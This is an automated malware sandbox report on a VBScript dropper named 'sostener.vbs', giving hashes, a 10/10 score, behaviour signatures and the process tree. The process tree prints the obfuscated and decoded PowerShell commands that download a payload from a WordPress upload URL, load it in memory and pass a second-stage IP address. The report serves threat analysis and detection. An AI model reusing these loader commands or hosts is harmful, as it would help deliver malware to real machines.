Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-09-2024 08:56

General

  • Target

    sostener.vbs

  • Size

    438KB

  • MD5

    7038e85f1e6e6405981b64ff58358482

  • SHA1

    9df67362f01d7a33a02a708fa6da1c3a1214fc51

  • SHA256

    a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447

  • SHA512

    e9bc9b726b17f8f513d36054647537d6e494bfb0087306ca52ca0f1f95785afa705ede98baaf71f19fead408f434a061a34ac6f0c457b0b77bdc51f93005c676

  • SSDEEP

    96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt

Signatures

  • Blocklisted process makes network request (2 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bz▒HE▒YQBh▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Mw▒n▒Ds▒J▒B3▒Gk▒a▒Bs▒HY▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒G4▒dQBv▒GE▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒dwB3▒Hc▒LgBp▒G4▒ZgBv▒HI▒bQBh▒GM▒aQBv▒G4▒bwBw▒G8▒cgB0▒HU▒bgBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQBm▒GE▒b▒▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bu▒G4▒dQBv▒GE▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒MQBT▒EQ▒LwBT▒FY▒TgBF▒C8▒egBy▒GE▒TQ▒v▒Gc▒ZQBS▒C8▒awBh▒FQ▒Lw▒5▒DY▒MQ▒u▒DM▒Mw▒y▒C4▒Mg▒w▒DI▒Lg▒x▒Dk▒Lw▒v▒Do▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dwBp▒Gg▒b▒B2▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bz▒HE▒YQBh▒Go▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2084

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    6a7974de816e53b87237556ba2ad3ca8

    SHA1

    d6ada0d8f741d81fe9a0a2cb6fed1b4624f2945c

    SHA256

    3ff52aaf0e60346f65c60bf4e1adc868ce3ee17b23015371fd07807985d818f2

    SHA512

    9fe6f3473a293dcf3530a29424742cbb951779164381bd1fe7f40717f82fd819102073166f603541b00af9925d2949033a6a21ef68b918a2e61f52a5f744d159

  • memory/2072-4-0x000007FEF59BE000-0x000007FEF59BF000-memory.dmp

    Filesize

    4KB

  • memory/2072-5-0x000000001B4B0000-0x000000001B792000-memory.dmp

    Filesize

    2.9MB

  • memory/2072-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

    Filesize

    32KB

  • memory/2072-12-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB

  • memory/2072-13-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB

  • memory/2072-14-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB